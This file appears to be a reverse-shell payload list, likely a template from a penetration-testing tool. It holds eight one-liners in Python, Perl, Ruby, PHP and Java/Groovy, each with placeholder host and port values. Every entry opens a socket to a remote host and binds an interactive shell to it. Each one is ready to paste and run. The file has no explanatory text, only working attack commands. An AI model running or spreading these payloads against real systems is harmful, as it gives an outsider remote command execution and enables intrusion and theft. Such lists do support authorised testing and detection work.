# desc: Python Linux
export RHOST="#{LHOST}";export RPORT=#{LPORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

# desc: Python Linux
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("#{LHOST}",#{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# desc: Perl
perl -e 'use Socket;$i="#{LHOST}";$p=#{LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# desc: Perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"#{LHOST}:#{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# desc: Ruby
ruby -rsocket -e'f=TCPSocket.open("#{LHOST}",#{LPORT}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# desc: Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("#{LHOST}","#{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# desc: PHP
php -r '$sock=fsockopen("#{LHOST}",#{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");'

# desc: Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/#{LHOST}/#{LPORT};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
